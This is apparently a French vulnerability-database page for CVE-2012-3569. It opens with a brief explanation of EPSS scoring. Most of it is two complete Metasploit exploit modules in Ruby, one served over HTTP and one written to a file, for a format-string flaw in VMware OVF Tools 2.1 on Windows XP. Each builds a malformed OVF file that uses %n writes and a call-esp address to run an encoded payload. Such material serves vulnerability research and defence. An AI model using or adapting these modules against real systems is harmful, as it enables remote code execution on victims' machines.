CVE-2012-3569 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => 'VMWare OVF Tools Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'CVE', '2012-3569' ], [ 'OSVDB', '87117' ], [ 'BID', '56468' ], [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x54\x59", # push esp # pop ecx 'EncoderOptions' => { 'BufferRegister' => 'ECX', 'BufferOffset' => 6 } }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # vmware-ovftool-2.1.0-467744-win-i386.msi [ 'VMWare OVF Tools 2.1 on Windows XP SP3', { 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 'AddrPops' => 98, 'StackPadding' => 38081, 'Alignment' => 4096 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 08 2012', 'DefaultTarget' => 0)) end def ovf my_payload = rand_text_alpha(4) # ebp my_payload << [target.ret].pack("V") # eip # call esp my_payload << payload.encoded fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 fs << my_payload # 65536 => 0x10000 # 27 => Error message prefix length fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) fs << "%08x" * target['AddrPops'] # Reach saved EBP fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 ovf_file = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <References> <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> </References> <DiskSection> <Info>Virtual disk information</Info> <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> </DiskSection> <VirtualSystem ovf:id="Small VM"> <Info>A virtual machine</Info> </VirtualSystem> </Envelope> EOF ovf_file end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri if agent !~ /VMware-client/ or agent !~ /ovfTool/ print_status("User agent #{agent} not recognized, answering Not Found...") send_not_found(cli) end if uri =~ /.mf$/ # The manifest file isn't required print_status("Sending Not Found for Manifest file request...") send_not_found(cli) end print_status("Sending OVF exploit...") send_response(cli, ovf, {'Content-Type'=>'text/xml'}) end end

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VMWare OVF Tools Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'CVE', '2012-3569' ], [ 'OSVDB', '87117' ], [ 'BID', '56468' ], [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x54\x59", # push esp # pop ecx 'EncoderOptions' => { 'BufferRegister' => 'ECX', 'BufferOffset' => 6 } }, 'Platform' => 'win', 'Targets' => [ # vmware-ovftool-2.1.0-467744-win-i386.msi [ 'VMWare OVF Tools 2.1 on Windows XP SP3', { 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 'AddrPops' => 98, 'StackPadding' => 38081, 'Alignment' => 4096 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 08 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']), ], self.class) end def ovf my_payload = rand_text_alpha(4) # ebp my_payload << [target.ret].pack("V") # eip # call esp my_payload << payload.encoded fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 fs << my_payload # 65536 => 0x10000 # 27 => Error message prefix length fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) fs << "%08x" * target['AddrPops'] # Reach saved EBP fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 ovf_file = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <References> <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> </References> <DiskSection> <Info>Virtual disk information</Info> <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> </DiskSection> <VirtualSystem ovf:id="Small VM"> <Info>A virtual machine</Info> </VirtualSystem> </Envelope> EOF ovf_file end def exploit print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1") file_create(ovf) end end